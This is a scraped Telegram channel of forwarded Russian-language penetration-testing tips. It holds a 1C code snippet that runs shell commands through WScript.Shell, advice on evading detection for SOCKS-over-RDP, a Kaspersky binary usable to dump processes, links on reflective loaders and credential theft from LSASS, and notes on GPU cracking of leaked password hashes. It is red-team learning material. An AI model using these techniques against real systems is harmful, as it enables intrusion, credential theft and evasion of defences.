Pentester`s Notes – Telegram
Pentester`s Notes
188 subscribers
47 photos
2 videos
31 files
136 links
Download Telegram
Forwarded from hidden account
Для 1с_rce нужно код вставить
Forwarded from Pentester`s Notes
shell=New COMObject("WScript.Shell");
e=shell.Exec("whoami");
Сообщить(e.StdOut.ReadAll());

#1c #1с #rce 1c rce
В ближайшее время планирую обработать исходный код этих обработок и собрать в одну универсальную, с возможностью выбора той или иной. Над реализацией ещё подумаю
Надо будет потестить, возможно стабильнее, чем rdp2tcp
Forwarded from true_security
Крутая тулза для организации socks через rdp соединение, работает практически без детектов. https://github.com/nccgroup/SocksOverRDP

Обратить внимание на строку:
#define SocksOverRDP_CHANNEL_NAME "SocksChannel"
Ну вы поняли☺️
Forwarded from 1N73LL1G3NC3
GTFONow

Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Forwarded from true_security
Сегодня в одном чате ребята обсуждали написание статьи про Lolbins.
Вот вам один интересный lolbas - C:\Program Files (x86)\Kaspersky Lab\NetworkAgent\kldumper.exe
описание - https://support.kaspersky.ru/common/diagnostics/7641
преза от ЛК, где предлагается сигма правило с исключением данного бинаря из сработки по дампу lsass - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

у kldumper.exe цифровая подпись ЛК. lsass им не дампил еще, но другие процессы дампит ок (при наличии прав лок админа)
Forwarded from APT
👩‍💻 Writing your own RDI /sRDI loader using C and ASM

Learn the process of crafting a personalized RDI/sRDI loader in C and ASM, incorporating code optimization to achieve full position independence.

🔗 https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/

#maldev #reflective #dll #clang #asm
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Очень большая и полная статья про принципы работы EDR

https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/

Автор даже свои модули писал чтобы лучше разобраться

https://github.com/sensepost/mydumbedr

#redteam #edr #blueteam
Forwarded from Offensive Xwitter
😈 [ MDSec @MDSecLabs ]

Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"

🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/

🐥 [ tweet ]
Forwarded from Кавычка (Bo0oM)
Быстро и дешево брутим хэши

Короч, есть чуваки такие, immers.cloud

По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.

Тут есть два варианта развития событий.

Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:


sudo apt-get update
sudo apt-get install gcc make tmux git mesa-common-dev cmake nvidia-cuda-toolkit build-essential unzip -y
https://ru.download.nvidia.com/XFree86/Linux-x86_64/470.63.01/NVIDIA-Linux-x86_64-470.63.01.run
chmod +x NVIDIA-Linux-x86_64-470.63.01.run
sudo ./NVIDIA-Linux-x86_64-470.63.01.run


Устанавливаем hashcat и играемся с этим всем.

Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.

Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.

>
🔥1
Атаки на Active Directory: часть 1 | DefconRU
https://defcon.ru/penetration-testing/18872/
Forwarded from RedTeam brazzers (Миша)
DC7499.pptx
5.2 MB
Способы получения учетных данных без взаимодействия с процессом lsass.exe

Продолжаю свой небольшой курс лекций, который я с радостью читаю в университете :) На этот раз решил подсветить и обратить внимание на варианты извлечения учётных данных без взаимодействия с процессом lsass.exe. Изначально презентация создавалась под субботнюю встречу DC7499, но записей оттуда пока что нет, поэтому я прочитал материал ещё раз, ведь тема действительно важная и может когда-нибудь спасти проект :)

С записью можно ознакомиться вот тут:
https://vk.com/video-210214143_456239063?list=07690309879b933b1b
Forwarded from Offensive Xwitter
😈 [ Evan McBroom @mcbroom_evan ]

I just published a blog and tool for the LSA Whisperer work that was presented at the SpecterOps Conference (SOCON) back in March.

If you are interested in getting credentials from LSASS without accessing its memory, check it out!

Blog:
🔗 https://medium.com/specter-ops-posts/lsa-whisperer-20874277ea3b

Tool:
🔗 https://github.com/Meowmycks/LetMeowIn

Crossposted on GH:
🔗 https://gist.github.com/EvanMcBroom/dceb1c7070ee3278eaedd04b42aed279

🐥 [ tweet ]